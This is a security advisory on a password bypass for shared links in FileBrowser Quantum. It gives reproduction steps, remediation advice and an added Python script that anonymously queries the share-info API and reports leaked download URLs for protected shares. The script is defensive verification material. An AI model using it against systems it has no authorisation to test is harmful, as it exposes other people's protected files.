FileBrowser Quantum Password Bypass Vulnerability in Shared Links
Vulnerability
A vulnerability in FileBrowser Quantum prior to versions 1.1.3-stable and 1.2.6-beta allows anyone holding the link to a password-protected share to bypass the password and download the shared files. The share-details API returns a direct download URL to any caller who presents the share hash from the link, whether or not the share is password-protected, so the password prompt on the share page can be skipped entirely. The affected releases are 1.1.2-stable and 1.2.5-beta.
Impact
Exploiting this vulnerability lets a recipient download password-protected files without ever entering the password. Password protection on shares therefore provides no effective access control: possession of the share link alone is sufficient to retrieve the files, which undermines the confidentiality of file sharing in the application.
Reproduction
To reproduce this vulnerability, an authenticated user creates a share for a file, sets a password on it, and allows anonymous access. After copying the share link, which contains the share hash, an unauthenticated client (no session cookie, no password) requests the 'shareinfo' API endpoint with that hash. The response includes a download URL, and requesting that URL returns the file without any password prompt.
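The check below is an added example, not code from FileBrowser Quantum or from the advisory. It automates the reproduction steps: it takes the share hash from a copied link, builds the share-info request, and reports whether the response exposes a download URL for a share that claims to be password-protected. The endpoint path `/public/api/shareinfo`, the `hash` query parameter, the `password_protected` and `downloadURL` field names, and the sample response are all assumptions introduced for illustration; adjust them to the deployment under test. The sample response is constructed, not captured from a real server.

```python
"""Check whether a share-info response leaks a download URL for a password-protected share.

Added example, not FileBrowser Quantum's own code. Endpoint path, query parameter and
JSON field names are assumptions; the advisory only says the 'shareinfo' endpoint takes
the share hash and that its response carries a download URL.
"""
import json
import sys
import urllib.parse
import urllib.request

# ASSUMPTION: path and query parameter of the share-info endpoint.
SHAREINFO_PATH = "/public/api/shareinfo"
HASH_PARAM = "hash"

# ASSUMPTION: field names a server might use to flag a share as password-protected.
PROTECTION_KEYS = ("password_protected", "passwordProtected", "protected", "has_password")


def share_hash_from_link(share_link: str) -> str:
    """Take the share hash from a copied share link, assuming it is the last path segment."""
    segments = [s for s in urllib.parse.urlparse(share_link).path.split("/") if s]
    if not segments:
        raise ValueError(f"no share hash found in {share_link!r}")
    return segments[-1]


def shareinfo_url(base_url: str, share_hash: str) -> str:
    """Build the share-info request URL for a given share hash."""
    query = urllib.parse.urlencode({HASH_PARAM: share_hash})
    return f"{base_url.rstrip('/')}{SHAREINFO_PATH}?{query}"


def find_download_urls(node, found=None) -> list:
    """Recursively collect string values that look like download links.

    Matching on the word 'download' in a key or value is a heuristic so the check
    does not depend on one exact schema; it is not a documented field list.
    """
    if found is None:
        found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(value, str) and ("download" in key.lower() or "download" in value.lower()):
                found.append(value)
            else:
                find_download_urls(value, found)
    elif isinstance(node, list):
        for item in node:
            find_download_urls(item, found)
    return found


def is_password_protected(info: dict) -> bool:
    """True if any of the assumed protection flags is set in the response."""
    return any(bool(info.get(key)) for key in PROTECTION_KEYS)


def assess_share(info: dict, base_url: str) -> dict:
    """Decide whether a share-info response leaks a download URL for a protected share.

    Relative URLs are resolved against base_url so the reported link is directly usable.
    """
    root = base_url.rstrip("/") + "/"
    urls = [urllib.parse.urljoin(root, u) for u in find_download_urls(info)]
    protected = is_password_protected(info)
    return {"password_protected": protected, "download_urls": urls, "vulnerable": protected and bool(urls)}


def fetch_shareinfo(base_url: str, share_hash: str, timeout: float = 10) -> dict:
    """Request share info anonymously (no session cookie, no password) and parse the JSON."""
    req = urllib.request.Request(shareinfo_url(base_url, share_hash), headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


# Constructed sample standing in for a vulnerable server's reply; the field names are
# illustrative and were not captured from FileBrowser Quantum.
SAMPLE_RESPONSE = {
    "hash": "abc123xyz",
    "path": "/reports/q3.pdf",
    "password_protected": True,
    "downloadURL": "/public/api/raw?hash=abc123xyz",
}

if __name__ == "__main__":
    # Usage: python check_share.py https://files.example.test https://files.example.test/share/<hash>
    if len(sys.argv) == 3:
        base, info = sys.argv[1], fetch_shareinfo(sys.argv[1], share_hash_from_link(sys.argv[2]))
    else:
        base, info = "https://files.example.test", SAMPLE_RESPONSE
    print(json.dumps(assess_share(info, base), indent=2))
```

Run it with no arguments to see the verdict on the constructed sample; pass a base URL and a share link to query a live instance you are authorised to test. A "vulnerable" result means the anonymous share-info call handed back a usable download link for a share that advertises password protection, which is exactly the condition the advisory describes.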
Remediation
Update to FileBrowser Quantum 1.1.3-stable or 1.2.6-beta, where this vulnerability has been fixed. After upgrading, confirm the fix by repeating the reproduction steps: the 'shareinfo' response for a password-protected share must no longer yield a download URL that serves the file without the password. Password-protected shares whose links were distributed while an affected version was running should be treated as exposed and re-created if the content is still sensitive.
